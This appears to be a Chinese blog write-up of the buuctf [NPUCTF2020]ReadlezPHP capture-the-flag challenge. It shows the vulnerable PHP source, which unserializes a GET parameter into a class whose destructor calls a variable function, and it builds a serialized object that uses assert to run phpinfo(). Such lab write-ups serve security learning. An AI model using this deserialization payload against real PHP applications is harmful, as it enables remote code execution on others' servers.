127,【3】 buuctf [NPUCTF2020]ReadlezPHP

进入靶场

吓我一跳

查看源码

点击

审计

php 复制代码
<?php

// 定义一个名为 HelloPhp 的类,该类可能用于执行与日期格式化相关的操作
class HelloPhp
{
    // 定义一个公共属性 $a,用于存储日期格式化的模板
    public $a;
    // 定义一个公共属性 $b,用于存储要调用的函数名
    public $b;

    // 构造函数,当创建 HelloPhp 类的对象时会自动调用
    public function __construct()
    {
        // 将日期格式化模板 "Y-m-d h:i:s" 赋值给属性 $a
        // "Y-m-d h:i:s" 表示年-月-日 时:分:秒 的格式
        $this->a = "Y-m-d h:i:s";
        // 将 PHP 的日期函数名 "date" 赋值给属性 $b
        $this->b = "date";
    }

    // 析构函数,当对象被销毁时会自动调用
    public function __destruct()
    {
        // 将属性 $a 的值赋给局部变量 $a
        $a = $this->a;
        // 将属性 $b 的值赋给局部变量 $b
        $b = $this->b;
        // 调用以 $b 为函数名的函数,并将 $a 作为参数传递给该函数
        // 由于 $b 为 "date",$a 为日期格式化模板,所以这里实际上是调用 date 函数进行日期格式化
        // 最后将格式化后的日期字符串输出
        echo $b($a);
    }
}

// 创建一个 HelloPhp 类的对象 $c
$c = new HelloPhp;

// 检查 $_GET 超全局数组中是否存在名为 'source' 的参数
if (isset($_GET['source'])) {
    // 如果存在 'source' 参数,则使用 highlight_file 函数高亮显示当前 PHP 文件的源代码
    highlight_file(__FILE__);
    // 终止脚本的执行,并返回状态码 0
    die(0);
}

// 使用 @ 符号抑制可能出现的错误信息
// 尝试对 $_GET 超全局数组中名为 "data" 的参数进行反序列化操作
// 并将反序列化后的结果赋值给变量 $ppp
@$ppp = unserialize($_GET["data"]);

我们需要通过get方式传参给data参数,并进行序列化操作

同时b包括函数名,a包括对应参数

system() 是 PHP 中的一个函数,其作用是执行外部程序,并将执行结果输出

但尝试了不行,换一个

assert() 函数在 PHP 中既可以用于调试和检查条件是否成立,也可以将传入的参数当作 PHP 代码来执行

此处就是利用了他的第二个性质

phpinfo() 函数用于输出 PHP 的配置信息

php 复制代码
<?php
class HelloPhp
{
    public $a = "phpinfo()";
    public $b = "assert";
}
$c = new HelloPhp();
echo serialize($c);
?> 

O:8:"HelloPhp":2:{s:1:"a";s:10:"phpinfo()";s:1:"b";s:6:"assert";}

相关推荐
神州问学2 小时前
智能背后的阴影:LLM安全风险
人工智能·安全
Hacker_xingchen3 小时前
网络安全威胁是什么
网络·安全·web安全
黑客KKKing3 小时前
网络安全技术复习总结
网络·安全·web安全
金士镧新材料有限公司5 小时前
稀土抑烟剂——为汽车火灾安全增添防线
人工智能·科技·安全·全文检索·生活
安科瑞王可6 小时前
安科瑞光伏发电防逆流解决方案--守护电网安全,提升能源效率
运维·物联网·安全·自动化·能源
iknow1818 小时前
【安全靶场】信息收集靶场
安全
代码改变世界ctw8 小时前
《Android13安全架构详解》
安全·安全架构
亚信安全官方账号8 小时前
亚信安全正式接入DeepSeek
安全
fan_0009 小时前
LKT4202UGM新一代安全认证加密芯片,守护联网设备和服务安全
安全